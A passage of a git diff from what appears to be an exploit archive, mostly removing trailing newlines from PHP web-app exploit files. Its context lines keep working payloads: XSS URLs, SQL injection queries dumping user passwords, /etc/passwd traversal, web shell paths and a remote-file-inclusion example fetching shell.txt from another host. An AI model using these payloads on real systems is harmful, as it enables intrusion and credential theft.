b/platforms/php/webapps/37637.pl @@ -52,5 +52,4 @@ print " successful read\n"; } else { print "\n[-] not successful\n"; - } - + } \ No newline at end of file diff --git a/platforms/php/webapps/3764.txt b/platforms/php/webapps/3764.txt index cf4f59976..cdfdc43fc 100755 --- a/platforms/php/webapps/3764.txt +++ b/platforms/php/webapps/3764.txt @@ -21,4 +21,4 @@ + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/37644.txt b/platforms/php/webapps/37644.txt index 42e5d4a46..b587791cf 100755 --- a/platforms/php/webapps/37644.txt +++ b/platforms/php/webapps/37644.txt @@ -55,4 +55,4 @@ http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E -http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E +http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37645.txt b/platforms/php/webapps/37645.txt index c8a6ebcf8..40d6aa12c 100755 --- a/platforms/php/webapps/37645.txt +++ b/platforms/php/webapps/37645.txt @@ -20,4 +20,4 @@ http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%2 http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC -http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC +http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC \ No newline at end of file diff --git a/platforms/php/webapps/3765.txt b/platforms/php/webapps/3765.txt index 22cc488ca..0a0a123f1 100755 --- a/platforms/php/webapps/3765.txt +++ b/platforms/php/webapps/3765.txt @@ -18,4 +18,4 @@ ---- GreeTz: All www.Asb-May.bet & WwW.MoHaNdKo.CoM & WwW.TrYaG.CoM -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/37659.txt b/platforms/php/webapps/37659.txt index 52758e4b9..12a98a9a0 100755 --- a/platforms/php/webapps/37659.txt +++ b/platforms/php/webapps/37659.txt @@ -27,4 +27,4 @@ uploaded content -- Solution -- -The vendor has fixed the issue in the version 4.21 +The vendor has fixed the issue in the version 4.21 \ No newline at end of file diff --git a/platforms/php/webapps/3766.txt b/platforms/php/webapps/3766.txt index 675263b5b..9cbaaec9c 100755 --- a/platforms/php/webapps/3766.txt +++ b/platforms/php/webapps/3766.txt @@ -39,4 +39,4 @@ $phpbb_root_path is not declared before include_once Shouts: str0ke, TheJT, Lu7k, GolD_M ;-) -# milw0rm.com [2007-04-19] +# milw0rm.com [2007-04-19] \ No newline at end of file diff --git a/platforms/php/webapps/37666.txt b/platforms/php/webapps/37666.txt index f92de5e86..b3fa153c2 100755 --- a/platforms/php/webapps/37666.txt +++ b/platforms/php/webapps/37666.txt @@ -88,4 +88,4 @@ Post data: lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PH Description: Allows for .ini files to be created wherever the web server has write access. If the .ini file already exists and is writable, it will be overwritten by the server. In a poorly configured system, this will allow for code execution by including applicable arguments in .ini files. This however is not applicable to most systems. Any non-protected .ini files will be possible to replace, with impact depending per file. This PoC will overwrite the file /etc/php5/apache2/php.ini with the content: ;key="val AnyData -;" +;" \ No newline at end of file diff --git a/platforms/php/webapps/37697.txt b/platforms/php/webapps/37697.txt index 0c69e2602..5c74d3e12 100755 --- a/platforms/php/webapps/37697.txt +++ b/platforms/php/webapps/37697.txt @@ -10,4 +10,4 @@ http://www.example.com//static/ajax.php?core[ajax]=true&core[call]=core.message& http://www.example.com//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=">&item_id=518&_=1346525603467 -http://www.example.com//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518">&_=1346525603467 +http://www.example.com//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518">&_=1346525603467 \ No newline at end of file diff --git a/platforms/php/webapps/37709.txt b/platforms/php/webapps/37709.txt index db026400c..cce6e950f 100755 --- a/platforms/php/webapps/37709.txt +++ b/platforms/php/webapps/37709.txt @@ -112,4 +112,4 @@ herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/3771.txt b/platforms/php/webapps/3771.txt index 537e90f7f..8974be1f0 100755 --- a/platforms/php/webapps/3771.txt +++ b/platforms/php/webapps/3771.txt @@ -15,4 +15,4 @@ # Exploit:[Path]/supasite/site_news.php?supa[db_path]=Shell # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group -# milw0rm.com [2007-04-21] +# milw0rm.com [2007-04-21] \ No newline at end of file diff --git a/platforms/php/webapps/37712.txt b/platforms/php/webapps/37712.txt index 9cfe22986..98e3ef280 100755 --- a/platforms/php/webapps/37712.txt +++ b/platforms/php/webapps/37712.txt @@ -122,4 +122,4 @@ herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/37715.txt b/platforms/php/webapps/37715.txt index 7436bb8a5..2fa2e8b34 100755 --- a/platforms/php/webapps/37715.txt +++ b/platforms/php/webapps/37715.txt @@ -24,4 +24,4 @@ POC : https://i.leetfil.es/e992ad2d.jpg -Discovered By Arash Khazaei +Discovered By Arash Khazaei \ No newline at end of file diff --git a/platforms/php/webapps/37726.txt b/platforms/php/webapps/37726.txt index 0f3c4927a..44e6fb273 100755 --- a/platforms/php/webapps/37726.txt +++ b/platforms/php/webapps/37726.txt @@ -9,4 +9,4 @@ Exploit : http://server/allgallery.php?id=-9999%27+[sql-command]+%23 Test : -http://server/demo/allgallery.php?id=-100%27+union+select+user()%23 +http://server/demo/allgallery.php?id=-100%27+union+select+user()%23 \ No newline at end of file diff --git a/platforms/php/webapps/3773.txt b/platforms/php/webapps/3773.txt index 5a1080e0c..c2d4e521f 100755 --- a/platforms/php/webapps/3773.txt +++ b/platforms/php/webapps/3773.txt @@ -23,4 +23,4 @@ imgsrv.php?acc=../config.php%00 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-22] +# milw0rm.com [2007-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/37734.html b/platforms/php/webapps/37734.html index 902bf1d3d..e4c199b1f 100755 --- a/platforms/php/webapps/37734.html +++ b/platforms/php/webapps/37734.html @@ -77,4 +77,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php - + \ No newline at end of file diff --git a/platforms/php/webapps/37735.txt b/platforms/php/webapps/37735.txt index b774ce375..5657199bd 100755 --- a/platforms/php/webapps/37735.txt +++ b/platforms/php/webapps/37735.txt @@ -71,4 +71,4 @@ phpinfo(); 2. -GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1 +GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/37738.txt b/platforms/php/webapps/37738.txt index 2d2db2093..965aa91dc 100755 --- a/platforms/php/webapps/37738.txt +++ b/platforms/php/webapps/37738.txt @@ -36,4 +36,4 @@ Click on the "send through your résume" and set the below vector in email field Now click on initiate chat PoC Video -https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4 +https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4 \ No newline at end of file diff --git a/platforms/php/webapps/3774.txt b/platforms/php/webapps/3774.txt index 1c4bdc3da..aea5e242b 100755 --- a/platforms/php/webapps/3774.txt +++ b/platforms/php/webapps/3774.txt @@ -26,4 +26,4 @@ index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/r -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-22] +# milw0rm.com [2007-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/3775.txt b/platforms/php/webapps/3775.txt index 7dff59e11..bbe7626d1 100755 --- a/platforms/php/webapps/3775.txt +++ b/platforms/php/webapps/3775.txt @@ -36,4 +36,4 @@ + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-22] +# milw0rm.com [2007-04-22] \ No newline at end of file diff --git a/platforms/php/webapps/37750.txt b/platforms/php/webapps/37750.txt index 4dd8eb8e2..5b189ece5 100755 --- a/platforms/php/webapps/37750.txt +++ b/platforms/php/webapps/37750.txt @@ -18,4 +18,4 @@ Shell Path : http://[Target]/wds_news/filer/shell.php # Facebook Profile : www.fb.com/ism.marzouk # #### #### #### #### #### #### #### #### # -Good Luck ^__^ +Good Luck ^__^ \ No newline at end of file diff --git a/platforms/php/webapps/37769.txt b/platforms/php/webapps/37769.txt index 0c40d6ab0..744caae31 100755 --- a/platforms/php/webapps/37769.txt +++ b/platforms/php/webapps/37769.txt @@ -26,5 +26,4 @@ if($fileout!=""){ ------------------------------ Exploit Code: -site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php - +site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php \ No newline at end of file diff --git a/platforms/php/webapps/3778.txt b/platforms/php/webapps/3778.txt index f0fef9786..df81efcde 100755 --- a/platforms/php/webapps/3778.txt +++ b/platforms/php/webapps/3778.txt @@ -92,4 +92,4 @@ sub usage() print "\n Example: perl $0 www.victim.com /pathtofm http://www.othersite.com/shell.txt\n\n"; } -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/37782.txt b/platforms/php/webapps/37782.txt index ff7bdf65b..996724758 100755 --- a/platforms/php/webapps/37782.txt +++ b/platforms/php/webapps/37782.txt @@ -112,4 +112,4 @@ print "$postResult"; # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs -#============================================================================================================ +#============================================================================================================ \ No newline at end of file diff --git a/platforms/php/webapps/37784.txt b/platforms/php/webapps/37784.txt index 7f42e31c6..27a889239 100755 --- a/platforms/php/webapps/37784.txt +++ b/platforms/php/webapps/37784.txt @@ -20,5 +20,4 @@ Maintenance message:
- - + \ No newline at end of file diff --git a/platforms/php/webapps/37786.txt b/platforms/php/webapps/37786.txt index 69e4fb623..5d4899671 100755 --- a/platforms/php/webapps/37786.txt +++ b/platforms/php/webapps/37786.txt @@ -30,6 +30,4 @@ http://www.example.com/phplinks/login.php In POST method : -email=[SQL]&forgotten=&password=[SQL]&submit=Login - - +email=[SQL]&forgotten=&password=[SQL]&submit=Login \ No newline at end of file diff --git a/platforms/php/webapps/3780.pl b/platforms/php/webapps/3780.pl index 0512cd14e..2968ad23f 100755 --- a/platforms/php/webapps/3780.pl +++ b/platforms/php/webapps/3780.pl @@ -98,4 +98,4 @@ sub istrue2 } -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/3781.txt b/platforms/php/webapps/3781.txt index 122bd3693..218775a4e 100755 --- a/platforms/php/webapps/3781.txt +++ b/platforms/php/webapps/3781.txt @@ -19,4 +19,4 @@ http://www.hackers.ir/advisories/joomla.html - Omid -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/37824.txt b/platforms/php/webapps/37824.txt index 5ce1b2e95..2ebecd842 100755 --- a/platforms/php/webapps/37824.txt +++ b/platforms/php/webapps/37824.txt @@ -60,5 +60,4 @@ Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the I am not a security professional, just a fan of computer security. If you have any questions/remarks, feel free to contact me. -I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-) - +I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-) \ No newline at end of file diff --git a/platforms/php/webapps/37826.txt b/platforms/php/webapps/37826.txt index dddbcc3f5..d5bc97a40 100755 --- a/platforms/php/webapps/37826.txt +++ b/platforms/php/webapps/37826.txt @@ -145,5 +145,4 @@ http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-lis http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php -http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php - +http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php \ No newline at end of file diff --git a/platforms/php/webapps/37827.txt b/platforms/php/webapps/37827.txt index fd14901be..ab4dc8a45 100755 --- a/platforms/php/webapps/37827.txt +++ b/platforms/php/webapps/37827.txt @@ -22,4 +22,4 @@ Host: exploit-masters.com Content-Type: application/x-www-form-urlencoded Referer: http://www.example.com/wordpress/contact/ -contactName=>"'>&email=&subject=&comments=&submitted= +contactName=>"'>&email=&subject=&comments=&submitted= \ No newline at end of file diff --git a/platforms/php/webapps/3783.txt b/platforms/php/webapps/3783.txt index 89383db18..851066129 100755 --- a/platforms/php/webapps/3783.txt +++ b/platforms/php/webapps/3783.txt @@ -20,4 +20,4 @@ # Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../../etc/passwd # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020 -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/37833.txt b/platforms/php/webapps/37833.txt index 6f5bd1b4a..e19dbd56b 100755 --- a/platforms/php/webapps/37833.txt +++ b/platforms/php/webapps/37833.txt @@ -21,6 +21,4 @@ GET Param "enterprise_id" - [Number of columns may vary] /store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61 GET Param "news_id" - [Number of columns may vary] -/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- - - +/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- \ No newline at end of file diff --git a/platforms/php/webapps/37836.txt b/platforms/php/webapps/37836.txt index 2004bb9f3..f13b6671e 100755 --- a/platforms/php/webapps/37836.txt +++ b/platforms/php/webapps/37836.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Token Manager 1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=tokenmanageredit&tid= -http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid= +http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid= \ No newline at end of file diff --git a/platforms/php/webapps/37837.html b/platforms/php/webapps/37837.html index 61b88414a..22a3a8aa2 100755 --- a/platforms/php/webapps/37837.html +++ b/platforms/php/webapps/37837.html @@ -32,4 +32,4 @@ Sexy Add Template 1.0 is vulnerable; other versions may also be affected. # - Access Shell: # http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!! # - # +################################################################################# + # +################################################################################# \ No newline at end of file diff --git a/platforms/php/webapps/37838.txt b/platforms/php/webapps/37838.txt index 398c0ee0d..81b9b6d93 100755 --- a/platforms/php/webapps/37838.txt +++ b/platforms/php/webapps/37838.txt @@ -4,4 +4,4 @@ Neturf eCommerce Shopping Cart is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/search.php?SearchFor= +http://www.example.com/search.php?SearchFor= \ No newline at end of file diff --git a/platforms/php/webapps/3785.txt b/platforms/php/webapps/3785.txt index b804acf8c..aabd1150d 100755 --- a/platforms/php/webapps/3785.txt +++ b/platforms/php/webapps/3785.txt @@ -97,4 +97,4 @@ die("Fixed bug by InyeXion."); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -# milw0rm.com [2007-04-23] +# milw0rm.com [2007-04-23] \ No newline at end of file diff --git a/platforms/php/webapps/3786.txt b/platforms/php/webapps/3786.txt index 60d586c8a..3e5591d54 100755 --- a/platforms/php/webapps/3786.txt +++ b/platforms/php/webapps/3786.txt @@ -16,4 +16,4 @@ #Miro_Tiger100[at]hotmail[dot]com -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/37885.html b/platforms/php/webapps/37885.html index 279b902b7..1aabcabe2 100755 --- a/platforms/php/webapps/37885.html +++ b/platforms/php/webapps/37885.html @@ -69,4 +69,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php - + \ No newline at end of file diff --git a/platforms/php/webapps/37886.txt b/platforms/php/webapps/37886.txt index 2f69dc159..9d29ee10d 100755 --- a/platforms/php/webapps/37886.txt +++ b/platforms/php/webapps/37886.txt @@ -110,4 +110,4 @@ GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation - GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6">84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1 - -GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1 +GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/37887.txt b/platforms/php/webapps/37887.txt index 8e3ecac2e..5226cf766 100755 --- a/platforms/php/webapps/37887.txt +++ b/platforms/php/webapps/37887.txt @@ -32,4 +32,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php -- -http://127.0.0.1:9999/wizards/get2post.php?file_name=C:\\test.txt +http://127.0.0.1:9999/wizards/get2post.php?file_name=C:\\test.txt \ No newline at end of file diff --git a/platforms/php/webapps/37888.txt b/platforms/php/webapps/37888.txt index f893d7a02..554298f97 100755 --- a/platforms/php/webapps/37888.txt +++ b/platforms/php/webapps/37888.txt @@ -240,4 +240,4 @@ alert('Pwned!!!!!!!!!!!!!!!!!!!!!!') - + \ No newline at end of file diff --git a/platforms/php/webapps/37906.txt b/platforms/php/webapps/37906.txt index 3368fc374..11148f260 100755 --- a/platforms/php/webapps/37906.txt +++ b/platforms/php/webapps/37906.txt @@ -47,4 +47,4 @@ htmlspecialchars($limit); ?>" size="5"> htmlspecialchars($aid); ?>"> =============================== -Discovered By : Ehsan Hosseini. +Discovered By : Ehsan Hosseini. \ No newline at end of file diff --git a/platforms/php/webapps/37926.txt b/platforms/php/webapps/37926.txt index 712439b13..b9fb8786a 100755 --- a/platforms/php/webapps/37926.txt +++ b/platforms/php/webapps/37926.txt @@ -37,4 +37,4 @@ Upgrade to latest version. +---------------------+ 12-Jan-2011: Netsweeper fixed issue on 2.6.29.10 17-Jan-2015: CVE assigned CVE-2014-9613 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37927.txt b/platforms/php/webapps/37927.txt index 2a3c297c2..5a71eb388 100755 --- a/platforms/php/webapps/37927.txt +++ b/platforms/php/webapps/37927.txt @@ -37,4 +37,4 @@ Upgrade to latest version. 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9612 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37928.txt b/platforms/php/webapps/37928.txt index d86cb90c2..ab86b3e76 100755 --- a/platforms/php/webapps/37928.txt +++ b/platforms/php/webapps/37928.txt @@ -53,4 +53,4 @@ Upgrade to latest version. 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9605 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37929.txt b/platforms/php/webapps/37929.txt index cb73213f1..aa3ed99f8 100755 --- a/platforms/php/webapps/37929.txt +++ b/platforms/php/webapps/37929.txt @@ -34,4 +34,4 @@ Upgrade to latest version. 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9610 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37930.txt b/platforms/php/webapps/37930.txt index 25736be88..ed59a0e68 100755 --- a/platforms/php/webapps/37930.txt +++ b/platforms/php/webapps/37930.txt @@ -64,4 +64,4 @@ Upgrade to latest version. 08-Apr-2015: Issues reported to Netsweeper 08-Apr-2015: Netsweeper bug ID 15475 08-Apr-2015: Netsweeper response, tickets opened and issues will be resolved in the 4.0.11 and 4.1.5 releases -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37931.txt b/platforms/php/webapps/37931.txt index 96054bf7a..601862980 100755 --- a/platforms/php/webapps/37931.txt +++ b/platforms/php/webapps/37931.txt @@ -33,4 +33,4 @@ Upgrade to latest version. 03-Dec-2014: Shared full details to replicate the issue 18-Dec-2014: Confirm fix on version 4.0.5 17-Jan-2015: CVE assigned CVE-2014-9611 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37932.txt b/platforms/php/webapps/37932.txt index fa465cfc1..250b5850d 100755 --- a/platforms/php/webapps/37932.txt +++ b/platforms/php/webapps/37932.txt @@ -39,4 +39,4 @@ Upgrade to latest version. 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9619 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37933.txt b/platforms/php/webapps/37933.txt index a6a928def..6c4c353b7 100755 --- a/platforms/php/webapps/37933.txt +++ b/platforms/php/webapps/37933.txt @@ -35,4 +35,4 @@ Upgrade to latest version. 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9618 -11-Aug-2015: Public disclosure +11-Aug-2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3794.txt b/platforms/php/webapps/3794.txt index 098a332e7..40abc8500 100755 --- a/platforms/php/webapps/3794.txt +++ b/platforms/php/webapps/3794.txt @@ -17,4 +17,4 @@ # Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/37948.txt b/platforms/php/webapps/37948.txt index c6e1fe5df..9ee78d83d 100755 --- a/platforms/php/webapps/37948.txt +++ b/platforms/php/webapps/37948.txt @@ -15,5 +15,4 @@ http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/v http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]= -http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]= - +http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]= \ No newline at end of file diff --git a/platforms/php/webapps/3795.txt b/platforms/php/webapps/3795.txt index bb7d3a28b..5174ab5bc 100755 --- a/platforms/php/webapps/3795.txt +++ b/platforms/php/webapps/3795.txt @@ -16,4 +16,4 @@ #By.Damar@Hotmail.Com -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/37955.html b/platforms/php/webapps/37955.html index 2dfccb71f..757a8d24a 100755 --- a/platforms/php/webapps/37955.html +++ b/platforms/php/webapps/37955.html @@ -54,4 +54,4 @@ Timeline : # Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P )) ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/37959.txt b/platforms/php/webapps/37959.txt index 446ff2ea2..ae074a69a 100755 --- a/platforms/php/webapps/37959.txt +++ b/platforms/php/webapps/37959.txt @@ -53,4 +53,4 @@ mysql_close($mysql); http://www.example.com/demo/demo1.png http://www.example.com/demo/demo2.png http://www.example.com/demo/demo3.png - + \ No newline at end of file diff --git a/platforms/php/webapps/3796.htm b/platforms/php/webapps/3796.htm index 4866c0c6c..d26481418 100755 --- a/platforms/php/webapps/3796.htm +++ b/platforms/php/webapps/3796.htm @@ -69,4 +69,4 @@ frameborder="0"> -# milw0rm.com [2007-04-24] +# milw0rm.com [2007-04-24] \ No newline at end of file diff --git a/platforms/php/webapps/37970.html b/platforms/php/webapps/37970.html index 578e1cde0..5fb809a5e 100755 --- a/platforms/php/webapps/37970.html +++ b/platforms/php/webapps/37970.html @@ -17,4 +17,4 @@ http://websecurity.com.ua value=""> - + \ No newline at end of file diff --git a/platforms/php/webapps/37971.html b/platforms/php/webapps/37971.html index 4cf19c10f..65f7d3ef9 100755 --- a/platforms/php/webapps/37971.html +++ b/platforms/php/webapps/37971.html @@ -33,5 +33,4 @@ alert(response); } - - + \ No newline at end of file diff --git a/platforms/php/webapps/37983.php b/platforms/php/webapps/37983.php index 1209a1df2..12a75abd5 100755 --- a/platforms/php/webapps/37983.php +++ b/platforms/php/webapps/37983.php @@ -111,5 +111,4 @@ preg_match($regex_cccvv, $intro, $cccvv); -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/37989.txt b/platforms/php/webapps/37989.txt index dcfe7d5a5..249117bad 100755 --- a/platforms/php/webapps/37989.txt +++ b/platforms/php/webapps/37989.txt @@ -27,5 +27,4 @@ https://community.invisionpower.com/release-notes/40121-r22/ Disclosure Timeline 27.07.15: Vendor notified 05.08.15: Fix released -27.08.15: Public disclosure - +27.08.15: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3799.txt b/platforms/php/webapps/3799.txt index 8a6b9e115..0882603e3 100755 --- a/platforms/php/webapps/3799.txt +++ b/platforms/php/webapps/3799.txt @@ -29,4 +29,4 @@ # 